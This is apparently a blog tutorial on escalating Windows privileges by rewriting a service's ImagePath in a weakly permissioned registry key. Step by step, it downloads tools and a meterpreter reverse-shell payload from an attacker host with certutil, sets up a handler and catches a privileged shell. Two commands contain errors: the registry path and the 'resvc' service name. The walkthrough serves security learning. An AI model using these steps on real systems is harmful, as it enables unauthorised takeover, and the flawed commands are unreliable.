Windows PrivEsc (5) -Weak Registry Permissions
This is the fifth of the Windows PrivEsc series, you can read the first of it which is about Unquoted Service Paths, the second which is about Hijacking DLLs ,the third: Exploiting Weak Service Permissions and the fourth: Autorun Programs
Windows Registry (what even …is that?)
A database of data, options, settings, and other values for software and devices installed on all editions of the Microsoft Windows operating system is known as the registry or Windows registry. A brand-new subkey is established in the registry after software installation. This subkey specifies options unique to that program, including its principal executable, location, and version.
Exploiting weak registry permissions
Most often modifying Registry values are limited to Administrator accounts only. However, you’ll come across some services that can be edited by the Standard account. In this Privilege Escalation technique, we will be identifying and modifying Registry values with a Standard account. In the Windows Registry, most services are located under:
HKLM\SYSTEM\CurrentControlSet\services\<service name>We start by already having foothold on the Windows target. We are running as a Standard user with no Admin privileges.
The exploitation Process can be performed by the following steps:
1. The first step involves the use of a tool called winPEAS. This is an enumeration tool that enumerates various Privilege Escalation vectors on a Windows target when executed on the target. We can use this tool enumerate a list of services with their registry values and their various permissions. You can clone winPEAS tool from github.
After that, serve it on the attacker machine.
python -m SimpleHTTPServer
Now download it unto your Windows Target with the certutil utility.
certutil.exe -f -URLcache http://<ATTACKER-IP>:8000/winPEASx64.exe winPEASx64.exe
2. Now execute the binary. The output is usually large so add the servicesinfo tag to limit the output to services running on the target machine.
winPEASx64.exe servicesinfoIn the output, we could make out one Insecure Registry Service configured on the target.
3. Let’s modify the service ImagePath and replace it with our own custom executable. Let’s generate our executable with msfvenom.
msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe LHOST=<attacker IP> LPORT=6161 -o shell.exe
4. Now host shell.exe on a python web server like before and upload it to the C:\Temp folder on the target using the certutil.exe utility.
5. Start a second listener which will catch the reverse shell when shell.exe is executed. A meterpreter handler in one line:
msfconsole -q -x “use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost <attacker-IP>; set lport 6161; run”
6. Now we can modify the ImagePath of the target registry Service and set it to the new location of where we have uploaded our custom executable we generated. This can be achieved by running the following in a Windows command shell:
reg add “HKEY\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\regsvc” /t REG_EXPAND_SZ /v ImagePath /d “C:\Temp\shell.exe” /f/t = There are a lot values under the regsvc key. we are basically saying the value with a type of REG_EXPAND_SZ
/v = Means value name under selected key.
/d = data to assign to registry ValueName being added.
/f = force overwrite existing registry entry without prompt.
7. Now that we’ve modified the registry, manually start the service with command:
sc start resvc
8. In our second listener, the moment the service is started, we catch a privileged Meterpreter shell.
And by that we have been able to identify misconfigurations in Windows Registry and we have leveraged it to escalate our Privileges.
I hope this piece helped you as it did for me. Reach out to me on Twitter @tinopreter Follow me for more cybersecurity related content while you’re at it.
